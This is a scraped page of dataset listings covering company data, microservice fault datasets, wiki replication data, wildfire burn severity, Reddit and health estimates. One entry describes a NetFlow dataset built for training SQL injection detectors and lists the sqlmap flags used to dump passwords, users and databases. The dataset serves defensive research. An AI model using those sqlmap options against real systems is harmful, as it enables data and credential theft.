Facebook
TwitterCompany Datasets for valuable business insights!
Discover new business prospects, identify investment opportunities, track competitor performance, and streamline your sales efforts with comprehensive Company Datasets.
These datasets are sourced from top industry providers, ensuring you have access to high-quality information:
We provide fresh and ready-to-use company data, eliminating the need for complex scraping and parsing. Our data includes crucial details such as:
You can choose your preferred data delivery method, including various storage options, delivery frequency, and input/output formats.
Receive datasets in CSV, JSON, and other formats, with storage options like AWS S3 and Google Cloud Storage. Opt for one-time, monthly, quarterly, or bi-annual data delivery.
With Oxylabs Datasets, you can count on:
Pricing Options:
Standard Datasets: choose from various ready-to-use datasets with standardized data schemas, priced from $1,000/month.
Custom Datasets: Tailor datasets from any public web domain to your unique business needs. Contact our sales team for custom pricing.
Experience a seamless journey with Oxylabs:
Unlock the power of data with Oxylabs' Company Datasets and supercharge your business insights today!
Facebook
TwitterThe total amount of data created, captured, copied, and consumed globally is forecast to increase rapidly. While it was estimated at ***** zettabytes in 2025, the forecast for 2029 stands at ***** zettabytes. Thus, global data generation will triple between 2025 and 2029. Data creation has been expanding continuously over the past decade. In 2020, the growth was higher than previously expected, caused by the increased demand due to the coronavirus (COVID-19) pandemic, as more people worked and learned from home and used home entertainment options more often.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Artifacts for the paper titled Root Cause Analysis for Microservice System based on Causal Inference: How Far Are We?.
This artifact repository contains 9 compressed folders, as follows:
ID File Name Description
1 syn_circa.zip CIRCA10, and CIRCA50 datasets for Causal Discovery
2 syn_rcd.zip RCD10, and RCD50 datasets for Causal Discovery
3 syn_causil.zip CausIL10, and CausIL50 datasets for Causal Discovery
4 rca_circa.zip CIRCA10, and CIRCA50 datasets for RCA
5 rca_rcd.zip RCD10, and RCD50 datasets for RCA
6 online-boutique.zip Online Boutique dataset for RCA
7 sock-shop-1.zip Sock Shop 1 dataset for RCA
8 sock-shop-2.zip Sock Shop 2 dataset for RCA
9 train-ticket.zip Train Ticket dataset for RCA
Each zip file contains the generated/collected data from the corresponding data generator or microservice benchmark systems (e.g., online-boutique.zip contains metrics data collected from the Online Boutique system).
Details about the generation of our datasets
We use three different synthetic data generators from three previous RCA studies [15, 25, 28] to create the synthetic datasets: CIRCA, RCD, and CausIL data generators. Their mechanisms are as follows:1. CIRCA datagenerator [28] generates a random causal directed acyclic graph (DAG) based on a given number of nodes and edges. From this DAG, time series data for each node is generated using a vector auto-regression (VAR) model. A fault is injected into a node by altering the noise term in the VAR model for two timestamps. 2. RCD data generator [25] uses the pyAgrum package [3] to generate a random DAG based on a given number of nodes, subsequently generating discrete time series data for each node, with values ranging from 0 to 5. A fault is introduced into a node by changing its conditional probability distribution.3. CausIL data generator [15] generates causal graphs and time series data that simulate the behavior of microservice systems. It first constructs a DAG of services and metrics based on domain knowledge, then generates metric data for each node of the DAG using regressors trained on real metrics data. Unlike the CIRCA and RCD data generators, the CausIL data generator does not have the capability to inject faults.To create our synthetic datasets, we first generate 10 DAGs whose nodes range from 10 to 50 for each of the synthetic data generators. Next, we generate fault-free datasets using these DAGs with different seedings, resulting in 100 cases for the CIRCA and RCD generators and 10 cases for the CausIL generator. We then create faulty datasets by introducing ten faults into each DAG and generating the corresponding faulty data, yielding 100 cases for the CIRCA and RCD data generators. The fault-free datasets (e.g. syn_rcd, syn_circa) are used to evaluate causal discovery methods, while the faulty datasets (e.g. rca_rcd, rca_circa) are used to assess RCA methods.
We deploy three popular benchmark microservice systems: Sock Shop [6], Online Boutique [4], and Train Ticket [8], on a four-node Kubernetes cluster hosted by AWS. Next, we use the Istio service mesh [2] with Prometheus [5] and cAdvisor [1] to monitor and collect resource-level and service-level metrics of all services, as in previous works [ 25 , 39, 59 ]. To generate traffic, we use the load generators provided by these systems and customise them to explore all services with 100 to 200 users concurrently. We then introduce five common faults (CPU hog, memory leak, disk IO stress, network delay, and packet loss) into five different services within each system. Finally, we collect metrics data before and after the fault injection operation. An overview of our setup is presented in the Figure below.
Code
The code to reproduce the experimental results in the paper is available at https://github.com/phamquiluan/RCAEval.
References
As in our paper.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Introduction
This datasets have SQL injection attacks (SLQIA) as malicious Netflow data. The attacks carried out are SQL injection for Union Query and Blind SQL injection. To perform the attacks, the SQLMAP tool has been used.
NetFlow traffic has generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for the collection and monitoring of network traffic flow data generated. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.
Datasets
The firts dataset was colleted to train the detection models (D1) and other collected using different attacks than those used in training to test the models and ensure their generalization (D2).
The datasets contain both benign and malicious traffic. All collected datasets are balanced.
The version of NetFlow used to build the datasets is 5.
Dataset
Aim
Samples
Benign-malicious
traffic ratio
D1
Training
400,003
50%
D2
Test
57,239
50%
Infrastructure and implementation
Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator that has a sensor ipt_netflow installed. The sensor consists of a module for the Linux kernel using Iptables, which processes the packets and converts them to NetFlow flows.
DOROTHEA is configured to use Netflow V5 and export the flow after it is inactive for 15 seconds or after the flow is active for 1800 seconds (30 minutes)
Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts. Users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks. On the one hand, it routes packets to the Internet. On the other hand, it sends it to a NetFlow data generation node (this process is carried out similarly to packets received from the Internet).
The malicious traffic collected (SQLI attacks) was performed using SQLMAP. SQLMAP is a penetration tool used to automate the process of detecting and exploiting SQL injection vulnerabilities.
The attacks were executed on 16 nodes and launch SQLMAP with the parameters of the following table.
Parameters
Description
'--banner','--current-user','--current-db','--hostname','--is-dba','--users','--passwords','--privileges','--roles','--dbs','--tables','--columns','--schema','--count','--dump','--comments', --schema'
Enumerate users, password hashes, privileges, roles, databases, tables and columns
--level=5
Increase the probability of a false positive identification
--risk=3
Increase the probability of extracting data
--random-agent
Select the User-Agent randomly
--batch
Never ask for user input, use the default behavior
--answers="follow=Y"
Predefined answers to yes
Every node executed SQLIA on 200 victim nodes. The victim nodes had deployed a web form vulnerable to Union-type injection attacks, which was connected to the MYSQL or SQLServer database engines (50% of the victim nodes deployed MySQL and the other 50% deployed SQLServer).
The web service was accessible from ports 443 and 80, which are the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes. For victim nodes, the address space was 126.52.30.0/24. The malicious traffic in the test sets was collected under different conditions. For D1, SQLIA was performed using Union attacks on the MySQL and SQLServer databases.
However, for D2, BlindSQL SQLIAs were performed against the web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1. In D2, the IP address space was 152.148.48.1/24 for benign and malicious traffic generating nodes and 140.30.20.1/24 for victim nodes.
To run the MySQL server we ran MariaDB version 10.4.12. Microsoft SQL Server 2017 Express and PostgreSQL version 13 were used.
Facebook
TwitterThis archive contains code and data for reproducing the analysis for “Replication Data for Revisiting ‘The Rise and Decline’ in a Population of Peer Production Projects”. Depending on what you hope to do with the data you probabbly do not want to download all of the files. Depending on your computation resources you may not be able to run all stages of the analysis. The code for all stages of the analysis, including typesetting the manuscript and running the analysis, is in code.tar. If you only want to run the final analysis or to play with datasets used in the analysis of the paper, you want intermediate_data.7z or the uncompressed tab and csv files. The data files are created in a four-stage process. The first stage uses the program “wikiq” to parse mediawiki xml dumps and create tsv files that have edit data for each wiki. The second stage generates all.edits.RDS file which combines these tsvs into a dataset of edits from all the wikis. This file is expensive to generate and at 1.5GB is pretty big. The third stage builds smaller intermediate files that contain the analytical variables from these tsv files. The fourth stage uses the intermediate files to generate smaller RDS files that contain the results. Finally, knitr and latex typeset the manuscript. A stage will only run if the outputs from the previous stages do not exist. So if the intermediate files exist they will not be regenerated. Only the final analysis will run. The exception is that stage 4, fitting models and generating plots, always runs. If you only want to replicate from the second stage onward, you want wikiq_tsvs.7z. If you want to replicate everything, you want wikia_mediawiki_xml_dumps.7z.001 wikia_mediawiki_xml_dumps.7z.002, and wikia_mediawiki_xml_dumps.7z.003. These instructions work backwards from building the manuscript using knitr, loading the datasets, running the analysis, to building the intermediate datasets. Building the manuscript using knitr This requires working latex, latexmk, and knitr installations. Depending on your operating system you might install these packages in different ways. On Debian Linux you can run apt install r-cran-knitr latexmk texlive-latex-extra. Alternatively, you can upload the necessary files to a project on Overleaf.com. Download code.tar. This has everything you need to typeset the manuscript. Unpack the tar archive. On a unix system this can be done by running tar xf code.tar. Navigate to code/paper_source. Install R dependencies. In R. run install.packages(c("data.table","scales","ggplot2","lubridate","texreg")) On a unix system you should be able to run make to build the manuscript generalizable_wiki.pdf. Otherwise you should try uploading all of the files (including the tables, figure, and knitr folders) to a new project on Overleaf.com. Loading intermediate datasets The intermediate datasets are found in the intermediate_data.7z archive. They can be extracted on a unix system using the command 7z x intermediate_data.7z. The files are 95MB uncompressed. These are RDS (R data set) files and can be loaded in R using the readRDS. For example newcomer.ds <- readRDS("newcomers.RDS"). If you wish to work with these datasets using a tool other than R, you might prefer to work with the .tab files. Running the analysis Fitting the models may not work on machines with less than 32GB of RAM. If you have trouble, you may find the functions in lib-01-sample-datasets.R useful to create stratified samples of data for fitting models. See line 89 of 02_model_newcomer_survival.R for an example. Download code.tar and intermediate_data.7z to your working folder and extract both archives. On a unix system this can be done with the command tar xf code.tar && 7z x intermediate_data.7z. Install R dependencies. install.packages(c("data.table","ggplot2","urltools","texreg","optimx","lme4","bootstrap","scales","effects","lubridate","devtools","roxygen2")). On a unix system you can simply run regen.all.sh to fit the models, build the plots and create the RDS files. Generating datasets Building the intermediate files The intermediate files are generated from all.edits.RDS. This process requires about 20GB of memory. Download all.edits.RDS, userroles_data.7z,selected.wikis.csv, and code.tar. Unpack code.tar and userroles_data.7z. On a unix system this can be done using tar xf code.tar && 7z x userroles_data.7z. Install R dependencies. In R run install.packages(c("data.table","ggplot2","urltools","texreg","optimx","lme4","bootstrap","scales","effects","lubridate","devtools","roxygen2")). Run 01_build_datasets.R. Building all.edits.RDS The intermediate RDS files used in the analysis are created from all.edits.RDS. To replicate building all.edits.RDS, you only need to run 01_build_datasets.R when the int... Visit https://dataone.org/datasets/sha256%3Acfa4980c107154267d8eb6dc0753ed0fde655a73a062c0c2f5af33f237da3437 for complete metadata about this dataset.
Facebook
TwitterI wanted to run data analysis and machine learning on a large dataset to build my data science skills but I felt out of touch with the various datasets available so I thought... how about I try and build my own dataset?
I wondered what data should be in the dataset and settled with online digital game purchases since I am an avid gamer. Imagine getting sales data from the PlayStation Store or Xbox Microsoft Store, this is what I was aiming to replicate.
I envisaged the dataset to be data created through the purchase of a digital game on either the UK PlayStation Store or Xbox Microsoft Store. Considering this, the scope of dataset varies depending on which column of data you are viewing, for example: - Date and Time: purchases were defined between a start/end date (this can be altered, see point 4) and, of course, anytime across the 24hr clock - Geographically: purchases were setup to come from any postcode in the UK - in total this is over 1,000,000 active postcodes - Purchases: the list of game titles available for purchase is 24 - Registered Banks: the list of registered banks in the UK (as of 03/2022) was 159
To generate the dataset, I built a function in Python. This function, when called with the number of rows you want in your dataset, will generate the dataset. For example, calling function(1000) will provide you with a dataset with 1000 rows.
Considering this, if just over 42,000 rows of data (42,892 to be exact) isn't enough, feel free to check out the code on my GitHub to run the function yourself with as many rows as you want.
Note: You can also edit the start/end dates of the function depending on which timespan you want the dataset to cover.
Yes, as stated above, this dataset is still a work in progress and is therefore not 100% perfect. There is a backlog of issues that need to be resolved. Feel free to check out the backlog.
One example of this is how on various columns, the distributions of data is equal, when in fact for the dataset to be entirely random, this should not be the case. An example of this issue is the Time column. These issues will be resolved in a later update.
Facebook
Twitterhttp://opendatacommons.org/licenses/dbcl/1.0/http://opendatacommons.org/licenses/dbcl/1.0/
The invoice dataset provided is a mock dataset generated using the Python Faker library. It has been designed to mimic the format of data collected from an online store. The dataset contains various fields, including first name, last name, email, product ID, quantity, amount, invoice date, address, city, and stock code. All of the data in the dataset is randomly generated and does not represent actual individuals or products. The dataset can be used for various purposes, including testing algorithms or models related to invoice management, e-commerce, or customer behavior analysis. The data in this dataset can be used to identify trends, patterns, or anomalies in online shopping behavior, which can help businesses to optimize their online sales strategies.
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Construct validity results.
Facebook
TwitterRdNBR is a remotely sensed index of the pre- to post-fire change in vegetation greenness, in this case the growing seasons in the year prior to and the year after the year in which the fire occurred. The mean composite scene selection method utilizes all valid pixels in all Landsat scenes over a specified date range to calculate the fire severity index. The CBI is a standardized field measure of vegetation burn severity (Key and Benson 2006), which here is predicted from a remotely sensed fire severity index using regression equations developed between CBI field plot data and the remote index, RBR (Parks et al 2019). The dataset featured provides an estimation of fire severity of past fires, with fire severity defined here as fire-induced change to vegetation. The dataset is limited to fires included in CAL FIRE’s Historic Wildland Fire Perimeters database and therefore is subject to the same limitations in terms of missing or erroneous data. This web app was developed to satisfy the requirements of Senate Bill No. 1101: An act to amend Sections 10295 and 10340 of the Public Contract Code, and to add Section 4114.4 to the Public Resources Code, relating to fire prevention.Methods:To develop these datasets, a feature service for fire perimeters was created from the CAL FIRE Fire and Resource Assessment Program’s Historic Wildland Fire Perimeters database (firep23_1) for fires or fires that were a part of complexes >= 1,000 acres from 2015 to 2023. This feature service is viewable on the California Vegetation Burn Severity Viewer and used to discover the RdNBR and CBI vegetation burn severity datasets. The feature service is titled Burn Severity Fire Perimeters (firep23_1_2015_2023_Fires_Complex_1000ac). After this feature service was uploaded to Google Earth Engine (GEE) as an asset, the Parks et al. 2018 script was used to generate RdNBR values with offset (rdnbr_w_offset) data for each individual fire and the Parks et al. 2019 script was used to generate bias corrected Composite Burn Index values (cbi_bc) data for each individual fire using 30m resolution Landsat Collection 2 data. To specify the date range of Landsat satellite images to be queried to create the one-year pre-fire and one-year post-fire mean composite image scenes in both scripts, the variable 'startday' was set to 152 (June 1st) and the variable 'endday' was set to 258 (September 15th) for all fires, as specified in Parks et al. (2019). These variables were used to define the ranges of Landsat scenes that were queried to create the one-year-pre-fire and one-year-post-fire mean composite Landsat scenes. These values were used, as they were detailed as the leaf-on period for the State of California in Parks et al. 2019. Once the RdNBR raster data for each fire had been produced using Parks et al. 2018's GEE script and the CBI raster data for each fire had been produced using Parks et al. 2019's GEE script, a Python script (run in a Jupyter Notebook embedded in the ArcGIS Pro software) was used to clip each fire-specific, continuous feature class to the extent of its fire perimeter. Each CBI feature class was additionally clipped to the extent of Conifer Forest and Hardwood Forest classes (defined in FVEG15's WHR13 Lifeform class for fires from 2015 to 2021 and defined in FVEG22's WHR13 Lifeform class for fires from 2022 to 2023).Once each continuous feature class had been clipped, values were reclassified to create a discrete RdNBR and CBI feature classes. Classes for RdNBR were arbitrarily chosen and do not correspond to meaningful categories of burn severity. Higher RdNBR values do indicate greater loss of vegetation greenness and negative values indicate an increase in greenness, but there is not necessarily a direct or linear correlation between RdNBR values and impacts to vegetation or ecological effects. Remotely sensed fire severity indices are translated into CBI using regression equations developed between CBI field plot data and the remote indices. Very few CBI plots exist in California or elsewhere in the U.S. for vegetation types other than forest. We therefore chose to include only forest vegetation in our CBI dataset. Classes for RdNBR were as follows: Code | Lower Limit (RdNBR) | Upper Limit (RdNBR) 1 < -1,000 -1,000 2 -1,000 -800 3 -800 -600 4 -600 -400 5 -400 -200 6 -200 0 7 0 200 8 200 400 9 400 600 10 600 800 11 800 1,000 12 1,000 1,200 13 1,200 1,400 14 1,400 1,600 15 1,600 > 1,600 Classes for CBI were as follows: Code | Lower Limit (CBI) | Upper Limit (CBI) | Burn Severity 1 0.00 0.10 Unburned 2 0.10 1.25 Low Vegetation Burn Severity 3 1.25 2.25 Moderate Vegetation Burn Severity 4 2.25 3.00 High Vegetation Burn Severity The discrete raster feature classes were then converted to vector feature classes. Finally, all individual discrete vector feature classes for individual fires were merged into two vector datasets, RdNBR Burn Severity Data (BurnSeverityRdNBR1523_1) and CBI Burn Severity Data (BurnSeverityCBIForest1523_1). These feature services are viewable on this web app, the California Vegetation Burn Severity Viewer.
Facebook
TwitterApache License, v2.0https://www.apache.org/licenses/LICENSE-2.0
License information was derived automatically
A common problem when creating models to generate business value from data is that the datasets can be so large that it can take days for the model to generate predictions. Ensuring that your dataset is stored as efficiently as possible is crucial for allowing these models to run on a more reasonable timescale without having to reduce the size of the dataset.
You've been hired by a major online data science training provider called Training Data Ltd. to clean up one of their largest customer datasets. This dataset will eventually be used to predict whether their students are looking for a new job or not, information that they will then use to direct them to prospective recruiters.
You've been given access to customer_train.csv, which is a subset of their entire customer dataset, so you can create a proof-of-concept of a much more efficient storage solution. The dataset contains anonymized student information, and whether they were looking for a new job or not during training:
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This tutorial will teach you how to take time-series data from many field sites and create a shareable online map, where clicking on a field location brings you to a page with interactive graph(s).
The tutorial can be completed with a sample dataset (provided via a Google Drive link within the document) or with your own time-series data from multiple field sites.
Part 1 covers how to make interactive graphs in Google Data Studio and Part 2 covers how to link data pages to an interactive map with ArcGIS Online. The tutorial will take 1-2 hours to complete.
An example interactive map and data portal can be found at: https://temple.maps.arcgis.com/apps/View/index.html?appid=a259e4ec88c94ddfbf3528dc8a5d77e8
Facebook
TwitterThe Reddit Subreddit Dataset by Dataplex offers a comprehensive and detailed view of Reddit’s vast ecosystem, now enhanced with appended AI-generated columns that provide additional insights and categorization. This dataset includes data from over 2.1 million subreddits, making it an invaluable resource for a wide range of analytical applications, from social media analysis to market research.
Dataset Overview:
This dataset includes detailed information on subreddit activities, user interactions, post frequency, comment data, and more. The inclusion of AI-generated columns adds an extra layer of analysis, offering sentiment analysis, topic categorization, and predictive insights that help users better understand the dynamics of each subreddit.
2.1 Million Subreddits with Enhanced AI Insights: The dataset covers over 2.1 million subreddits and now includes AI-enhanced columns that provide: - Sentiment Analysis: AI-driven sentiment scores for posts and comments, allowing users to gauge community mood and reactions. - Topic Categorization: Automated categorization of subreddit content into relevant topics, making it easier to filter and analyze specific types of discussions. - Predictive Insights: AI models that predict trends, content virality, and user engagement, helping users anticipate future developments within subreddits.
Sourced Directly from Reddit:
All social media data in this dataset is sourced directly from Reddit, ensuring accuracy and authenticity. The dataset is updated regularly, reflecting the latest trends and user interactions on the platform. This ensures that users have access to the most current and relevant data for their analyses.
Key Features:
Use Cases:
Data Quality and Reliability:
The Reddit Subreddit Dataset emphasizes data quality and reliability. Each record is carefully compiled from Reddit’s vast database, ensuring that the information is both accurate and up-to-date. The AI-generated columns further enhance the dataset's value, providing automated insights that help users quickly identify key trends and sentiments.
Integration and Usability:
The dataset is provided in a format that is compatible with most data analysis tools and platforms, making it easy to integrate into existing workflows. Users can quickly import, analyze, and utilize the data for various applications, from market research to academic studies.
User-Friendly Structure and Metadata:
The data is organized for easy navigation and analysis, with metadata files included to help users identify relevant subreddits and data points. The AI-enhanced columns are clearly labeled and structured, allowing users to efficiently incorporate these insights into their analyses.
Ideal For:
This dataset is an essential resource for anyone looking to understand the intricacies of Reddit's vast ecosystem, offering the data and AI-enhanced insights needed to drive informed decisions and strategies across various fields. Whether you’re tracking emerging trends, analyzing user behavior, or conduc...
Facebook
TwitterCC0 1.0 Universal Public Domain Dedicationhttps://creativecommons.org/publicdomain/zero/1.0/
License information was derived automatically
This interactive tool allows users to generate tables and graphs on information relating to pregnancy and childbirth. All data comes from the CDC's PRAMS. Topics include: breastfeeding, prenatal care, insurance coverage and alcohol use during pregnancy. Background CPONDER is the interaction online data tool for the Center's for Disease Control and Prevention (CDC)'s Pregnancy Risk Assessment Monitoring System (PRAMS). PRAMS gathers state and national level data on a variety of topics related to pregnancy and childbirth. Examples of information include: breastfeeding, alcohol use, multivitamin use, prenatal care, and contraception. User Functionality Users select choices from three drop down menus to search for d ata. The menus are state, year and topic. Users can then select the specific question from PRAMS they are interested in, and the data table or graph will appear. Users can then compare that question to another state or to another year to generate a new data table or graph. Data Notes The data source for CPONDER is PRAMS. The data is from every year between 2000 and 2008, and data is available at the state and national level. However, states must have participated in PRAMS to be part of CPONDER. Not every state, and not every year for every state, is available.
Facebook
TwitterThe USDA Agricultural Research Service (ARS) recently established SCINet , which consists of a shared high performance computing resource, Ceres, and the dedicated high-speed Internet2 network used to access Ceres. Current and potential SCINet users are using and generating very large datasets so SCINet needs to be provisioned with adequate data storage for their active computing. It is not designed to hold data beyond active research phases. At the same time, the National Agricultural Library has been developing the Ag Data Commons, a research data catalog and repository designed for public data release and professional data curation. Ag Data Commons needs to anticipate the size and nature of data it will be tasked with handling. The ARS Web-enabled Databases Working Group, organized under the SCINet initiative, conducted a study to establish baseline data storage needs and practices, and to make projections that could inform future infrastructure design, purchases, and policies. The SCINet Web-enabled Databases Working Group helped develop the survey which is the basis for an internal report. While the report was for internal use, the survey and resulting data may be generally useful and are being released publicly. From October 24 to November 8, 2016 we administered a 17-question survey (Appendix A) by emailing a Survey Monkey link to all ARS Research Leaders, intending to cover data storage needs of all 1,675 SY (Category 1 and Category 4) scientists. We designed the survey to accommodate either individual researcher responses or group responses. Research Leaders could decide, based on their unit's practices or their management preferences, whether to delegate response to a data management expert in their unit, to all members of their unit, or to themselves collate responses from their unit before reporting in the survey. Larger storage ranges cover vastly different amounts of data so the implications here could be significant depending on whether the true amount is at the lower or higher end of the range. Therefore, we requested more detail from "Big Data users," those 47 respondents who indicated they had more than 10 to 100 TB or over 100 TB total current data (Q5). All other respondents are called "Small Data users." Because not all of these follow-up requests were successful, we used actual follow-up responses to estimate likely responses for those who did not respond. We defined active data as data that would be used within the next six months. All other data would be considered inactive, or archival. To calculate per person storage needs we used the high end of the reported range divided by 1 for an individual response, or by G, the number of individuals in a group response. For Big Data users we used the actual reported values or estimated likely values. Resources in this dataset:Resource Title: Appendix A: ARS data storage survey questions. File Name: Appendix A.pdfResource Description: The full list of questions asked with the possible responses. The survey was not administered using this PDF but the PDF was generated directly from the administered survey using the Print option under Design Survey. Asterisked questions were required. A list of Research Units and their associated codes was provided in a drop down not shown here. Resource Software Recommended: Adobe Acrobat,url: https://get.adobe.com/reader/ Resource Title: CSV of Responses from ARS Researcher Data Storage Survey. File Name: Machine-readable survey response data.csvResource Description: CSV file includes raw responses from the administered survey, as downloaded unfiltered from Survey Monkey, including incomplete responses. Also includes additional classification and calculations to support analysis. Individual email addresses and IP addresses have been removed. This information is that same data as in the Excel spreadsheet (also provided).Resource Title: Responses from ARS Researcher Data Storage Survey. File Name: Data Storage Survey Data for public release.xlsxResource Description: MS Excel worksheet that Includes raw responses from the administered survey, as downloaded unfiltered from Survey Monkey, including incomplete responses. Also includes additional classification and calculations to support analysis. Individual email addresses and IP addresses have been removed.Resource Software Recommended: Microsoft Excel,url: https://products.office.com/en-us/excel
Facebook
TwitterThis dataset contains model-based census tract level estimates for the PLACES 2022 release in GIS-friendly format. PLACES covers the entire United States—50 states and the District of Columbia (DC)—at county, place, census tract, and ZIP Code Tabulation Area levels. It provides information uniformly on this large scale for local areas at 4 geographic levels. Estimates were provided by the Centers for Disease Control and Prevention (CDC), Division of Population Health, Epidemiology and Surveillance Branch. PLACES was funded by the Robert Wood Johnson Foundation in conjunction with the CDC Foundation. Data sources used to generate these model-based estimates include Behavioral Risk Factor Surveillance System (BRFSS) 2020 or 2019 data, Census Bureau 2010 population estimates, and American Community Survey (ACS) 2015–2019 estimates. The 2022 release uses 2020 BRFSS data for 25 measures and 2019 BRFSS data for 4 measures (high blood pressure, taking high blood pressure medication, high cholesterol, and cholesterol screening) that the survey collects data on every other year. These data can be joined with the census tract 2015 boundary file in a GIS system to produce maps for 29 measures at the census tract level. An ArcGIS Online feature service is also available for users to make maps online or to add data to desktop GIS software. https://cdcarcgis.maps.arcgis.com/home/item.html?id=3b7221d4e47740cab9235b839fa55cd7
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
# RP Automatic-comment-generation
This folder contains all the material needed to replicate the experiments.
## Content
- [RP Automatic-comment-generation](#automatic-comment-generation)
- Appendix.pdf
- [Content](#content)
- [Dataset/](#dataset/)
- [Online evaluation/](#online-evaluation/)
- [Results/](#results/)
- [SI-Approach/](#SI-Approach/)
## Dataset/
This contains the data for the online evaluation
- #### Online evaluation/
Contains set of questions used in online evaluation, results of these questions and lists of classes used for each online evaluation
- [Class_understanding_questions.xlsx](RP-Automatic-comment-generation\Dataset\Online_evaluation\Class_understanding_questions.xlsx)
Questions used to determin if a participant understood the functionality of a class.
- [Q_and_A_class_comment_characteristics.xlsx](RP-Automatic-comment-generation\Dataset\Online_evaluation\Q_and_A_class_comment_characteristics)
Questions and possible answers used for the evaluation of the characteristics adequacy, conciseness and comprehensibility of a generated class comment.
- [Q_and_A_what_participants_write_and_look_for.xlsx](RP-Automatic-comment-generation\Dataset\Online_evaluation\Q_and_A_what_participants_write_and_look_for.xlsx)
Questions and possible answers used to determine what participants look for and write in class comments.
- [Classes_used_in_evaluation1.xlsx](RP-Automatic-comment-generation\Dataset\Online_evaluation\Classes_used_in_evaluation1.xlsx)
Extracted classes with information to LOC, instance variables, number of methods, number of classes using it and class stereotypes for evaluation 1.
- [Classes_used_in_evaluation2.xlsx](RP-Automatic-comment-generation\Dataset\Online_evaluation\Classes_used_in_evaluation2.xlsx)
Extracted classes with information to LOC, instance variables, number of methods, number of classes using it and class stereotypes for evaluation 2.
- [Classes_used_in_evaluation3.xlsx](RP-Automatic-comment-generation\Dataset\Online_evaluation\Classes_used_in_evaluation3.xlsx)
Extracted classes with information to LOC, instance variables, number of methods, number of classes using it and class stereotypes for evaluation 3.
- [Classes_used_in_evaluation4.xlsx](RP-Automatic-comment-generation\Dataset\Online_evaluation\Classes_used_in_evaluation4.xlsx)
Extracted classes with information to LOC, instance variables, number of methods, number of classes using it and class stereotypes for evaluation 4.
- [How_often_participants_write_comments.xlsx](RP-Automatic-comment-generation\Dataset\Online_evaluation\How_often_participants_write_comments.xlsx)
Results for distribution of how often participants claim to write comments.
- [How_participants_follow_class_comment_template.xlsx](RP-Automatic-comment-generation\Dataset\Online_evaluation\How_participants_follow_class_comment_template.xlsx)
Results for distribution of how participants follow the class comment template.
- [What_participants_look_for_in_comments.xlsx](RP-Automatic-comment-generation\Dataset\Online_evaluation\What_participants_look_for_in_comments.xlsx)
Results of evaluation for what participants look for in class comments.
- [What_participants_write_in_comments.xlsx](\RP-Automatic-comment-generation\Dataset\Online_evaluation\What_participants_write_in_comments.xlsx)
Results of evaluation for what participants write in class comments.
## Results/
- #### SI-Approach/
Contains all the data for the results related to SI-Approach and the scripts used to generate said data.
- [Class_stereotype_distribution.xlsx](RP-Automatic-comment-generation\Results\SI-Approach\Class_stereotype_distribution.xlsx)
Extracted class stereotypes for 350 random classes in the Pharo base image. Evaluated in 10 classes per step.
- [Class_stereotype_script.txt](RP-Automatic-comment-generation\Results\SI-Approach\Class_stereotype_script.txt)
Script used in the Playground of Pharo to return counts of how many classes get assigned the specific class stereotypes. Returns numbers for the class stereotypes in alphabetical order. Boundary => Small
- [Method_stereotype_dstribution.xlsx](RP-Automatic-comment-generation\Results\SI-Approach\Method_stereotype_distribution.xlsx)
Extracted method stereotypes for 500 random classes in the Pharo base image. Evaluated in 20 classes per step.
- [Method_stereotype_script.txt](RP-Automatic-comment-generation\Results\SI-Approach\Method_stereotype_script.txt)
Script used in the Playground of Pharo to return counts of how many methods get assigned the specific method stereotypes. Returns numbers for the method stereotypes in the order Accessors, Getters, Mutators, Setters, Collaborators, Controllers, Factories and Degenerate.
Replication package of 'Can We Automatically Generate Class Comments in Pharo?'
# RP Automatic-comment-generation
This folder contains all the material needed to replicate the experiments.
Content
Dataset/
This contains the data for the online evaluation
- #### Online evaluation/
Contains set of questions used in online evaluation, results of these questions and lists of classes used for each online evaluation
- Class_understanding_questions.xlsx
Questions used to determin if a participant understood the functionality of a class.
- Q_and_A_class_comment_characteristics.xlsx
Questions and possible answers used for the evaluation of the characteristics adequacy, conciseness and comprehensibility of a generated class comment.
- Q_and_A_what_participants_write_and_look_for.xlsx
Questions and possible answers used to determine what participants look for and write in class comments.
- Classes_used_in_evaluation1.xlsx
Extracted classes with information to LOC, instance variables, number of methods, number of classes using it and class stereotypes for evaluation 1.
- Classes_used_in_evaluation2.xlsx
Extracted classes with information to LOC, instance variables, number of methods, number of classes using it and class stereotypes for evaluation 2.
- Classes_used_in_evaluation3.xlsx
Extracted classes with information to LOC, instance variables, number of methods, number of classes using it and class stereotypes for evaluation 3.
- Classes_used_in_evaluation4.xlsx
Extracted classes with information to LOC, instance variables, number of methods, number of classes using it and class stereotypes for evaluation 4.
- How_often_participants_write_comments.xlsx
Results for distribution of how often participants claim to write comments.
- How_participants_follow_class_comment_template.xlsx
Results for distribution of how participants follow the class comment template.
- What_participants_look_for_in_comments.xlsx
Results of evaluation for what participants look for in class comments.
- What_participants_write_in_comments.xlsx
Results of evaluation for what participants write in class comments.
Results/
- #### SI-Approach/
Contains all the data for the results related to SI-Approach and the scripts used to generate said data.
- Class_stereotype_distribution.xlsx
Extracted class stereotypes for 350 random classes in the Pharo base image. Evaluated in 10 classes per step.
- Class_stereotype_script.txt
Script used in the Playground of Pharo to return counts of how many classes get assigned the specific class stereotypes. Returns numbers for the class stereotypes in alphabetical order. Boundary => Small
- Method_stereotype_dstribution.xlsx
Extracted method stereotypes for 500 random classes in the Pharo base image. Evaluated in 20 classes per step.
- Method_stereotype_script.txt
